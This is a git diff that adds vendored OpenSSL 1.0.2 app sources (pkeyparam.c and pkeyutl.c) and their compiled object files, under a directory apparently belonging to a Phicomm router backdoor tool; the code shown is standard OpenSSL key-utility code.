+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+#include <stdio.h>
+#include <string.h>
+#include "apps.h"
+#include <openssl/pem.h>
+#include <openssl/err.h>
+#include <openssl/evp.h>
+
+#define PROG pkeyparam_main
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    char **args, *infile = NULL, *outfile = NULL;
+    BIO *in = NULL, *out = NULL;
+    int text = 0, noout = 0;
+    EVP_PKEY *pkey = NULL;
+    int badarg = 0;
+#ifndef OPENSSL_NO_ENGINE
+    char *engine = NULL;
+#endif
+    int ret = 1;
+
+    if (bio_err == NULL)
+        bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    ERR_load_crypto_strings();
+    OpenSSL_add_all_algorithms();
+    args = argv + 1;
+    while (!badarg && *args && *args[0] == '-') {
+        if (!strcmp(*args, "-in")) {
+            if (args[1]) {
+                args++;
+                infile = *args;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-out")) {
+            if (args[1]) {
+                args++;
+                outfile = *args;
+            } else
+                badarg = 1;
+        }
+#ifndef OPENSSL_NO_ENGINE
+        else if (strcmp(*args, "-engine") == 0) {
+            if (!args[1])
+                goto bad;
+            engine = *(++args);
+        }
+#endif
+
+        else if (strcmp(*args, "-text") == 0)
+            text = 1;
+        else if (strcmp(*args, "-noout") == 0)
+            noout = 1;
+        args++;
+    }
+
+    if (badarg) {
+#ifndef OPENSSL_NO_ENGINE
+ bad:
+#endif
+        BIO_printf(bio_err, "Usage pkeyparam [options]\n");
+        BIO_printf(bio_err, "where options are\n");
+        BIO_printf(bio_err, "-in file        input file\n");
+        BIO_printf(bio_err, "-out file       output file\n");
+        BIO_printf(bio_err, "-text           print parameters as text\n");
+        BIO_printf(bio_err,
+                   "-noout          don't output encoded parameters\n");
+#ifndef OPENSSL_NO_ENGINE
+        BIO_printf(bio_err,
+                   "-engine e       use engine e, possibly a hardware device.\n");
+#endif
+        return 1;
+    }
+#ifndef OPENSSL_NO_ENGINE
+    setup_engine(bio_err, engine, 0);
+#endif
+
+    if (infile) {
+        if (!(in = BIO_new_file(infile, "r"))) {
+            BIO_printf(bio_err, "Can't open input file %s\n", infile);
+            goto end;
+        }
+    } else
+        in = BIO_new_fp(stdin, BIO_NOCLOSE);
+
+    if (outfile) {
+        if (!(out = BIO_new_file(outfile, "w"))) {
+            BIO_printf(bio_err, "Can't open output file %s\n", outfile);
+            goto end;
+        }
+    } else {
+        out = BIO_new_fp(stdout, BIO_NOCLOSE);
+#ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+#endif
+    }
+
+    pkey = PEM_read_bio_Parameters(in, NULL);
+    if (!pkey) {
+        BIO_printf(bio_err, "Error reading parameters\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (!noout)
+        PEM_write_bio_Parameters(out, pkey);
+
+    if (text)
+        EVP_PKEY_print_params(out, pkey, 0, NULL);
+
+    ret = 0;
+
+ end:
+    EVP_PKEY_free(pkey);
+    BIO_free_all(out);
+    BIO_free(in);
+
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkeyparam.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkeyparam.o
new file mode 100644
index 0000000000000000000000000000000000000000..ea2bdd30cf732df9412b61124a92c0923ae9eef3
GIT binary patch
literal 5248
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkeyutl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkeyutl.c
new file mode 100644
index 0000000..aaa9074
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkeyutl.c
@@ -0,0 +1,523 @@
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2006.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "apps.h"
+#include <string.h>
+#include <openssl/err.h>
+#include <openssl/pem.h>
+#include <openssl/evp.h>
+
+#define KEY_PRIVKEY     1
+#define KEY_PUBKEY      2
+#define KEY_CERT        3
+
+static void usage(void);
+
+#undef PROG
+
+#define PROG pkeyutl_main
+
+static EVP_PKEY_CTX *init_ctx(int *pkeysize,
+                              char *keyfile, int keyform, int key_type,
+                              char *passargin, int pkey_op, ENGINE *e);
+
+static int setup_peer(BIO *err, EVP_PKEY_CTX *ctx, int peerform,
+                      const char *file);
+
+static int do_keyop(EVP_PKEY_CTX *ctx, int pkey_op,
+                    unsigned char *out, size_t *poutlen,
+                    unsigned char *in, size_t inlen);
+
+int MAIN(int argc, char **);
+
+int MAIN(int argc, char **argv)
+{
+    BIO *in = NULL, *out = NULL;
+    char *infile = NULL, *outfile = NULL, *sigfile = NULL;
+    ENGINE *e = NULL;
+    int pkey_op = EVP_PKEY_OP_SIGN, key_type = KEY_PRIVKEY;
+    int keyform = FORMAT_PEM, peerform = FORMAT_PEM;
+    char badarg = 0, rev = 0;
+    char hexdump = 0, asn1parse = 0;
+    EVP_PKEY_CTX *ctx = NULL;
+    char *passargin = NULL;
+    int keysize = -1;
+
+    unsigned char *buf_in = NULL, *buf_out = NULL, *sig = NULL;
+    size_t buf_outlen;
+    int buf_inlen = 0, siglen = -1;
+
+    int ret = 1, rv = -1;
+
+    argc--;
+    argv++;
+
+    if (!bio_err)
+        bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+    ERR_load_crypto_strings();
+    OpenSSL_add_all_algorithms();
+
+    while (argc >= 1) {
+        if (!strcmp(*argv, "-in")) {
+            if (--argc < 1)
+                badarg = 1;
+            else
+                infile = *(++argv);
+        } else if (!strcmp(*argv, "-out")) {
+            if (--argc < 1)
+                badarg = 1;
+            else
+                outfile = *(++argv);
+        } else if (!strcmp(*argv, "-sigfile")) {
+            if (--argc < 1)
+                badarg = 1;
+            else
+                sigfile = *(++argv);
+        } else if (!strcmp(*argv, "-inkey")) {
+            if (--argc < 1)
+                badarg = 1;
+            else {
+                ctx = init_ctx(&keysize,
+                               *(++argv), keyform, key_type,
+                               passargin, pkey_op, e);
+                if (!ctx) {
+                    BIO_puts(bio_err, "Error initializing context\n");
+                    ERR_print_errors(bio_err);
+                    badarg = 1;
+                }
+            }
+        } else if (!strcmp(*argv, "-peerkey")) {
+            if (--argc < 1)
+                badarg = 1;
+            else if (!setup_peer(bio_err, ctx, peerform, *(++argv)))
+                badarg = 1;
+        } else if (!strcmp(*argv, "-passin")) {
+            if (--argc < 1)
+                badarg = 1;
+            else
+                passargin = *(++argv);
+        } else if (strcmp(*argv, "-peerform") == 0) {
+            if (--argc < 1)
+                badarg = 1;
+            else
+                peerform = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-keyform") == 0) {
+            if (--argc < 1)
+                badarg = 1;
+            else
+                keyform = str2fmt(*(++argv));
+        }
+#ifndef OPENSSL_NO_ENGINE
+        else if (!strcmp(*argv, "-engine")) {
+            if (--argc < 1)
+                badarg = 1;
+            else
+                e = setup_engine(bio_err, *(++argv), 0);
+        }
+#endif
+        else if (!strcmp(*argv, "-pubin"))
+            key_type = KEY_PUBKEY;
+        else if (!strcmp(*argv, "-certin"))
+            key_type = KEY_CERT;
+        else if (!strcmp(*argv, "-asn1parse"))
+            asn1parse = 1;
+        else if (!strcmp(*argv, "-hexdump"))
+            hexdump = 1;
+        else if (!strcmp(*argv, "-sign"))
+            pkey_op = EVP_PKEY_OP_SIGN;
+        else if (!strcmp(*argv, "-verify"))
+            pkey_op = EVP_PKEY_OP_VERIFY;
+        else if (!strcmp(*argv, "-verifyrecover"))
+            pkey_op = EVP_PKEY_OP_VERIFYRECOVER;
+        else if (!strcmp(*argv, "-rev"))
+            rev = 1;
+        else if (!strcmp(*argv, "-encrypt"))
+            pkey_op = EVP_PKEY_OP_ENCRYPT;
+        else if (!strcmp(*argv, "-decrypt"))
+            pkey_op = EVP_PKEY_OP_DECRYPT;
+        else if (!strcmp(*argv, "-derive"))
+            pkey_op = EVP_PKEY_OP_DERIVE;
+        else if (strcmp(*argv, "-pkeyopt") == 0) {
+            if (--argc < 1)
+                badarg = 1;
+            else if (!ctx) {
+                BIO_puts(bio_err, "-pkeyopt command before -inkey\n");
+                badarg = 1;
+            } else if (pkey_ctrl_string(ctx, *(++argv)) <= 0) {
+                BIO_puts(bio_err, "parameter setting error\n");
+                ERR_print_errors(bio_err);
+                goto end;
+            }
+        } else
+            badarg = 1;
+        if (badarg) {
+            usage();
+            goto end;
+        }
+        argc--;
+        argv++;
+    }
+
+    if (!ctx) {
+        usage();
+        goto end;
+    }
+
+    if (sigfile && (pkey_op != EVP_PKEY_OP_VERIFY)) {
+        BIO_puts(bio_err, "Signature file specified for non verify\n");
+        goto end;
+    }
+
+    if (!sigfile && (pkey_op == EVP_PKEY_OP_VERIFY)) {
+        BIO_puts(bio_err, "No signature file specified for verify\n");
+        goto end;
+    }
+
+/* FIXME: seed PRNG only if needed */
+    app_RAND_load_file(NULL, bio_err, 0);
+
+    if (pkey_op != EVP_PKEY_OP_DERIVE) {
+        if (infile) {
+            if (!(in = BIO_new_file(infile, "rb"))) {
+                BIO_puts(bio_err, "Error Opening Input File\n");
+                ERR_print_errors(bio_err);
+                goto end;
+            }
+        } else
+            in = BIO_new_fp(stdin, BIO_NOCLOSE);
+    }
+
+    if (outfile) {
+        if (!(out = BIO_new_file(outfile, "wb"))) {
+            BIO_printf(bio_err, "Error Creating Output File\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    } else {
+        out = BIO_new_fp(stdout, BIO_NOCLOSE);
+#ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+#endif
+    }
+
+    if (sigfile) {
+        BIO *sigbio = BIO_new_file(sigfile, "rb");
+        if (!sigbio) {
+            BIO_printf(bio_err, "Can't open signature file %s\n", sigfile);
+            goto end;
+        }
+        siglen = bio_to_mem(&sig, keysize * 10, sigbio);
+        BIO_free(sigbio);
+        if (siglen <= 0) {
+            BIO_printf(bio_err, "Error reading signature data\n");
+            goto end;
+        }
+    }
+
+    if (in) {
+        /* Read the input data */
+        buf_inlen = bio_to_mem(&buf_in, keysize * 10, in);
+        if (buf_inlen <= 0) {
+            BIO_printf(bio_err, "Error reading input Data\n");
+            exit(1);
+        }
+        if (rev) {
+            size_t i;
+            unsigned char ctmp;
+            size_t l = (size_t)buf_inlen;
+            for (i = 0; i < l / 2; i++) {
+                ctmp = buf_in[i];
+                buf_in[i] = buf_in[l - 1 - i];
+                buf_in[l - 1 - i] = ctmp;
+            }
+        }
+    }
+
+    if (pkey_op == EVP_PKEY_OP_VERIFY) {
+        rv = EVP_PKEY_verify(ctx, sig, (size_t)siglen,
+                             buf_in, (size_t)buf_inlen);
+        if (rv == 0)
+            BIO_puts(out, "Signature Verification Failure\n");
+        else if (rv == 1)
+            BIO_puts(out, "Signature Verified Successfully\n");
+        if (rv >= 0)
+            goto end;
+    } else {
+        rv = do_keyop(ctx, pkey_op, NULL, (size_t *)&buf_outlen,
+                      buf_in, (size_t)buf_inlen);
+        if (rv > 0) {
+            buf_out = OPENSSL_malloc(buf_outlen);
+            if (!buf_out)
+                rv = -1;
+            else
+                rv = do_keyop(ctx, pkey_op,
+                              buf_out, (size_t *)&buf_outlen,
+                              buf_in, (size_t)buf_inlen);
+        }
+    }
+
+    if (rv <= 0) {
+        BIO_printf(bio_err, "Public Key operation error\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+    ret = 0;
+    if (asn1parse) {
+        if (!ASN1_parse_dump(out, buf_out, buf_outlen, 1, -1))
+            ERR_print_errors(bio_err);
+    } else if (hexdump)
+        BIO_dump(out, (char *)buf_out, buf_outlen);
+    else
+        BIO_write(out, buf_out, buf_outlen);
+
+ end:
+    if (ctx)
+        EVP_PKEY_CTX_free(ctx);
+    BIO_free(in);
+    BIO_free_all(out);
+    if (buf_in)
+        OPENSSL_free(buf_in);
+    if (buf_out)
+        OPENSSL_free(buf_out);
+    if (sig)
+        OPENSSL_free(sig);
+    return ret;
+}
+
+static void usage()
+{
+    BIO_printf(bio_err, "Usage: pkeyutl [options]\n");
+    BIO_printf(bio_err, "-in file        input file\n");
+    BIO_printf(bio_err, "-out file       output file\n");
+    BIO_printf(bio_err,
+               "-sigfile file signature file (verify operation only)\n");
+    BIO_printf(bio_err, "-inkey file     input key\n");
+    BIO_printf(bio_err, "-keyform arg    private key format - default PEM\n");
+    BIO_printf(bio_err, "-pubin          input is a public key\n");
+    BIO_printf(bio_err,
+               "-certin         input is a certificate carrying a public key\n");
+    BIO_printf(bio_err, "-pkeyopt X:Y    public key options\n");
+    BIO_printf(bio_err, "-sign           sign with private key\n");
+    BIO_printf(bio_err, "-verify         verify with public key\n");
+    BIO_printf(bio_err,
+               "-verifyrecover  verify with public key, recover original data\n");
+    BIO_printf(bio_err, "-encrypt        encrypt with public key\n");
+    BIO_printf(bio_err, "-decrypt        decrypt with private key\n");
+    BIO_printf(bio_err, "-derive         derive shared secret\n");
+    BIO_printf(bio_err, "-hexdump        hex dump output\n");
+#ifndef OPENSSL_NO_ENGINE
+    BIO_printf(bio_err,
+               "-engine e       use engine e, possibly a hardware device.\n");
+#endif
+    BIO_printf(bio_err, "-passin arg     pass phrase source\n");
+
+}
+
+static EVP_PKEY_CTX *init_ctx(int *pkeysize,
+                              char *keyfile, int keyform, int key_type,
+                              char *passargin, int pkey_op, ENGINE *e)
+{
+    EVP_PKEY *pkey = NULL;
+    EVP_PKEY_CTX *ctx = NULL;
+    char *passin = NULL;
+    int rv = -1;
+    X509 *x;
+    if (((pkey_op == EVP_PKEY_OP_SIGN) || (pkey_op == EVP_PKEY_OP_DECRYPT)
+         || (pkey_op == EVP_PKEY_OP_DERIVE))
+        && (key_type != KEY_PRIVKEY)) {
+        BIO_printf(bio_err, "A private key is needed for this operation\n");
+        goto end;
+    }
+    if (!app_passwd(bio_err, passargin, NULL, &passin, NULL)) {
+        BIO_printf(bio_err, "Error getting password\n");
+        goto end;
+    }
+    switch (key_type) {
+    case KEY_PRIVKEY:
+        pkey = load_key(bio_err, keyfile, keyform, 0,
+                        passin, e, "Private Key");
+        break;
+
+    case KEY_PUBKEY:
+        pkey = load_pubkey(bio_err, keyfile, keyform, 0,
+                           NULL, e, "Public Key");
+        break;
+
+    case KEY_CERT:
+        x = load_cert(bio_err, keyfile, keyform, NULL, e, "Certificate");
+        if (x) {
+            pkey = X509_get_pubkey(x);
+            X509_free(x);
+        }
+        break;
+
+    }
+
+    *pkeysize = EVP_PKEY_size(pkey);
+
+    if (!pkey)
+        goto end;
+
+    ctx = EVP_PKEY_CTX_new(pkey, e);
+
+    EVP_PKEY_free(pkey);
+
+    if (!ctx)
+        goto end;
+
+    switch (pkey_op) {
+    case EVP_PKEY_OP_SIGN:
+        rv = EVP_PKEY_sign_init(ctx);
+        break;
+
+    case EVP_PKEY_OP_VERIFY:
+        rv = EVP_PKEY_verify_init(ctx);
+        break;
+
+    case EVP_PKEY_OP_VERIFYRECOVER:
+        rv = EVP_PKEY_verify_recover_init(ctx);
+        break;
+
+    case EVP_PKEY_OP_ENCRYPT:
+        rv = EVP_PKEY_encrypt_init(ctx);
+        break;
+
+    case EVP_PKEY_OP_DECRYPT:
+        rv = EVP_PKEY_decrypt_init(ctx);
+        break;
+
+    case EVP_PKEY_OP_DERIVE:
+        rv = EVP_PKEY_derive_init(ctx);
+        break;
+    }
+
+    if (rv <= 0) {
+        EVP_PKEY_CTX_free(ctx);
+        ctx = NULL;
+    }
+
+ end:
+
+    if (passin)
+        OPENSSL_free(passin);
+
+    return ctx;
+
+}
+
+static int setup_peer(BIO *err, EVP_PKEY_CTX *ctx, int peerform,
+                      const char *file)
+{
+    EVP_PKEY *peer = NULL;
+    int ret;
+    if (!ctx) {
+        BIO_puts(err, "-peerkey command before -inkey\n");
+        return 0;
+    }
+
+    peer = load_pubkey(bio_err, file, peerform, 0, NULL, NULL, "Peer Key");
+
+    if (!peer) {
+        BIO_printf(bio_err, "Error reading peer key %s\n", file);
+        ERR_print_errors(err);
+        return 0;
+    }
+
+    ret = EVP_PKEY_derive_set_peer(ctx, peer);
+
+    EVP_PKEY_free(peer);
+    if (ret <= 0)
+        ERR_print_errors(err);
+    return ret;
+}
+
+static int do_keyop(EVP_PKEY_CTX *ctx, int pkey_op,
+                    unsigned char *out, size_t *poutlen,
+                    unsigned char *in, size_t inlen)
+{
+    int rv = 0;
+    switch (pkey_op) {
+    case EVP_PKEY_OP_VERIFYRECOVER:
+        rv = EVP_PKEY_verify_recover(ctx, out, poutlen, in, inlen);
+        break;
+
+    case EVP_PKEY_OP_SIGN:
+        rv = EVP_PKEY_sign(ctx, out, poutlen, in, inlen);
+        break;
+
+    case EVP_PKEY_OP_ENCRYPT:
+        rv = EVP_PKEY_encrypt(ctx, out, poutlen, in, inlen);
+        break;
+
+    case EVP_PKEY_OP_DECRYPT:
+        rv = EVP_PKEY_decrypt(ctx, out, poutlen, in, inlen);
+        break;
+
+    case EVP_PKEY_OP_DERIVE:
+        rv = EVP_PKEY_derive(ctx, out, poutlen);
+        break;
+
+    }
+    return rv;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkeyutl.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkeyutl.o
new file mode 100644
index 0000000000000000000000000000000000000000..8939393be095844869aaa0f2c4171aef87f927fc
GIT binary patch
literal 15416
zcmeI2e{dAXmB&X2fh@xc^UH7$JaGg_2I(~Vg}^3g^>bt|ut5Uzds(eU(i&-ZvpdVL
z5aUEBVI#1eyQExYr(BLN_Fdv6_Qg5J@nIqdu))Q}oGa&~V&ik&<r0)N{y|&>|J-};
zP50`lwUboc-JjQ0JJbE??|a?zx~FHRr9&;g)=7DJnoN1xXSK1Cq?-10{aC(%vJIL?
zo38oI;ni3)kJaMI7`aHL|A+rq0ogi=0ZqMQrd}~qFZxo?txcU-jYDLY9V#BYT4;Z2
z@T#6%N~+b`B;a#bYm+rCIh&AjFh)-Pv3Su3-rK#YjCYfFqqlQohnf1LIr!$jZgY6@
z;!<eKOf{GE86)N(4XkFq&|KoDL50j_%p~WCK{u{Aqn#?CdS}oD92!Z^@*c;j)M8{>
zj7!F)(VlBGjSRe*m(0PFg~lZ+J>OiiLh~Lk1SzzzJOc^aqzMOgbs8LMv8poPk(7$_
zZ1j#&G^LC#GxIRhGL$L4`-{*w-|#Xq9KO`s)F$-qdgw**;m5$%9BwMai=H>S9Xz`!
zzr>XKXw{!l-p-VTqlLMY#Y6uEou?j@f!cfQaEbN_T=($qLf^67g?LfB=vthZe)sCf
znT$QfJNQvya)vQ7c(7!4p6F+Ci8*YS)VCNT#>?h0U&*eE%nmN|I-w&xYCx-KJ;^S^
zQ@-719;3nYe$F`CVx0B+hMP-bX6mis&XRgENiUKLKh#4reylRif`;mMwx^yCr0W2d
z`i@P<wy`VOYN$1bM(nv}>IIVfQhzd2Cn?*WdL2q)5<vKuuN}HleE93&!MFkyWAf9K
zHHR+Qd%a)!i01yfLkl4oGwdoj>UJFk#&3$jO*f(pZv_K0cr(;w>y~753$wYI*&NIR
zIYAB;$-HsN96ngG%N)ws1+pu}LlskT=J3VOsdEtJM}G*Nm@uD;ht9(_(%6?z!TP2`
z-!QG7I0+lzI+OFWMot(me)EG&X7mRiWimdPA$~C;FkBG!24`4&skda%wr+utCl`y(
z`BHxn-o)Z8WuuS7$eS=eskgCVle&!KZ+cUwePX=K;qB1E(52#gywF!^ir{bz&9QoP
z30($V0=vN$&?VkVD(42P$Gd*?DiY^$!PGa9dLgO5KsN#P2Rc?cdh*X$`~im793F2`
zI{Nio7R84@og2^2ji=_uf5H~k{udwqeQx~g-1uy6{7i2Az1;YL-1ultJTw9e5e4}t
zxFW$UE6Xu`FD|>9f#n)kY-jZzeFD|P3A{6KX`)dX8Y#Y~0$ceD^M9MulKov1R+~a8
zx95oP;Vldg6RLyt7)#@qs|8>W%UbFaBSY<q+u7cUHuE&Q32)4K!W$`Ialy&IW_-__
z3vvYf{%phh(*fCM*~#=I<5l#pYjz|0*SY`p)M@m;YP^4A1X`Hr{vxcl<K3e<U9N4T
z>%#G_UqIJ4m~c}Us{YCO=zZXDw_UQl$UJtiWV4z2Ibk0>%Tv!&wq@wbp+&iEpTY;u
z;4d=f(5rSV>jW0f-;m|d$RTK%FK1%8_!-zakL|k-!gJWJGehT%v+b$#?f-faA3c6E
z^J4qTGd4UYZt*mHt!A#7d9L|u#SKSRP;K*(X>-%Rg4c;*Uy0urIzyw}iB+51L$AQg
